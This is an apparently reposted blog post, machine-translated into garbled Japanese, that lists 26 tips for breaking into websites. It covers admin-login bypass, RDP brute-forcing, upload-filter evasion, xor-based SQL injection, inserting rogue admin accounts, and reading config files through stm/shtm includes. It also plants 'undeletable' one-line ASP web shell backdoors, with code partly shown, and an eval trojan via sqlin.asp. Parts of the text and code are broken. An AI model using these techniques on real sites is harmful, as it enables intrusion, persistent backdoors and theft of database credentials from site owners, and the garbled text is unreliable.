16種類のウェブサイトの浸透技術の経験を総括して分かち合います

3633 ワード

1.ウェブサイトのフィルタリングが厳しくなく、直接バックグラウンドの検証を迂回し、ウェブサイトの後ろにadmin/sessionを加える.aspまたはadmin/left.asp
2.バックグラウンドに入るとスクリプトプロンプトボックスが表示され、入力:administratorで突破できます.adminは管理者として入るという意味だからです.
3.あるウェブサイトは3389を开いて、侵入する前にまず3389に接続して、弱いパスワードを试みてあるいは爆破して、更に5回shiftボタンを押して、前人が后ろのドアを诘めたことがあるかどうかを见て、それから社会人のパスワード.
4.バックグラウンドに入ると、プロンプトボックス「ログインしてください」がポップアップされ、アドレスが書き写され(コピーできません)、Webソースアナライザに置いて、ブラウザを選択します.
5.盗難防止チェーンを突破してwebshellにアクセスし、コード:javascript:document.write(「fuck」)車に戻ってGOをクリックするとwebshellに入ります
6.一流の情报モニタリングブロックシステムのアクセスを突破して、马がアクセスすることができて、大きい马をアップロードしてもだめな时、先に大きい马で1枚の画像と合并して、アップロードして合并した后の画像、それからデータベースのバックアップの后でアクセスすることができます!
7.エディタのshellを持つ場合、asp|asa|cer|php|aspxなどの拡張子を追加してアップロードする場合はフィルタリングされますが、実際にはaaspspを追加するだけでaspをアップロードすると突破します.
8.时にはDが表の段を当てたが、フィールドが当てられない时、バックグラウンドでソースファイルを见て、IDやtypeを検索することができて、普通はすべて见つけることができて、更にDにフィールドを追加して推測の内容を突破することができます.
9.社会人のバックグラウンドのパスワードはこのテクニックを使うことができて、もしウェブサイトのドメイン名が:www.baidu.com管理者名はadminで、パスワード「baidu」と「baidu.com」を試してログインしてみてください.
10.手動注入時にand 1=1 and 1=2をフィルタリングした場合、xor 1=1 xor 1=2で判断できます.
11.ローカル構造で一言をアップロードし、「アップロードするファイルを先に選択してください![再アップロード]」とヒントを与えたら、ファイルが小さすぎることを説明し、メモ帳で開けてから複数の言葉をコピーしてファイルサイズを拡大し、アップロードすればよい.
12.あーあdランニングメーターで、ランニングフィールド名nameやpassが出てこない、表示長さが50を超えるなど、当てられない場合は、この時に山甲を着て走るのが普通です!
13.管理者のバックグラウンドのテクニックを当てて、admin/left.asp、admin/main.asp、admin/top.asp、admin/admin.aspはメニューナビゲーションを表示し、すべてのリンクをダウンロードします.
14.テーブル名、フィールドを知り、SQL文を使用してACCESSデータベースにユーザー名とパスワード文を追加する:Insert into admin(user,pwd)values(‘test’,’test’)
15.管理者のパスワードを取得しても、管理者のアカウントが手に入らない場合は、フロントに行って勝手にニュースを開き、「提出者」「発表者」などの言葉を探します.一般的に「提出者」は管理者のアカウントです.
16.ASP+IISが架設したウェブサイトのweb絶対経路を爆破し、ウェブサイトのホームページが以下のように仮定する.http://www.xxxxx/index.asp/送信http://www.xxxxx.cn/fkbhvv.aspx/,fkbhvv.aspxは存在しません.
17.ソースコードの利用、多くのウェブサイトはすべてネット上でダウンロードしたソースコードを使って、ある駅長はとても怠け者で、何も変えないで、それからアップロードしてウェブサイトを開通して、私达はダウンロードすることができて、中には多くのデフォルトの情報が利用する価値があります.
18.以下のコードをwebshellにアップロードします.接尾辞はaspです.他の人が発見しても削除できません.超削除防止の一言です.木馬です.安全に裏口を残して、包丁でパスワードを接続することができます.x
 
        
 39 then:f.attributes = 39:end if%>

  
19.アカウントのパスワードを解読してもバックグラウンドが見つからない場合は、ftpにリンクしてみてください.ドメイン名がwww.baiduであれば.com「得られたパスワードは「bishi」で、「xxxx」「xxxx.cn」www.xxxxを使ってみましょう.cnはFTPユーザー名として、「bishi」:FTPパスワードとしてログインし、成功する確率が高いですよ!ftpのデフォルトポート:21デフォルトアカウントパスワード:test
20.あるバックグラウンドには認証コードが表示されないので、ログインできませんか?実は1段のコードをレジストリにインポートすればこの苦境を突破することができて、下のコードをCodeに保存します.reg、ダブルクリックでインポートできます!
 
      
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000

  
21.ウェブサイトがasp、asa、phpなどのファイルをアップロードすることを許可しない時、私達は1つのstmファイルをアップロードすることができて、コードは“”です(どんなファイルを見たいならどんなファイル名を書いて、ここで私は“conn.asp”を見たいと仮定します)、それから直接このstmファイルの住所を開いて、更にソースコードを調べて、“conn.asp”のこのファイルのコードは一望できます!
22.ウェブサイトがASP、CGI、CER、CDX、HTRなどのタイプのファイルをアップロードすることを許可しない時、shtmファイルをアップロードしてみて、内容は:アップロードに成功すれば、それはよかった、アクセスアドレスはconn.aspの中の内容を閲覧することができて、このようにして、データベースの経路も手に入れました!
23.手動で注入点を検出して「あなたの操作は記録されています!」などの情報は、このファイルにアクセスします:sqlin.aspは、存在する場合、注入点の後ろに「excute(request(「TNT」)という一言の木馬クライアント接続を植え込みます.http://www.xxx.com/sqlin.asp多くの注入防止プログラムが「sqlin.asp」というファイル名は、不正に記録されたデータベースを作成します.
24.傍注すると、aspxをサポートするサイトを選んで来日したに違いないが、問題はどのように判断するのか.方法は簡単で、ウェブサイトの後ろにxxxをつけます.aspxは、"/"アプリケーションのサーバエラーが返され、リソースが見つからない場合、404画面でaspx木馬をサポートすることを示す.
25.サイトの後ろにtestを追加します.phpはバージョンを表示できます
26.タブーこの2つのサイトのバックグラウンドファイルadmin_index.asp  manage_login.asp
転載先:https://www.cnblogs.com/sybboy/p/5046113.html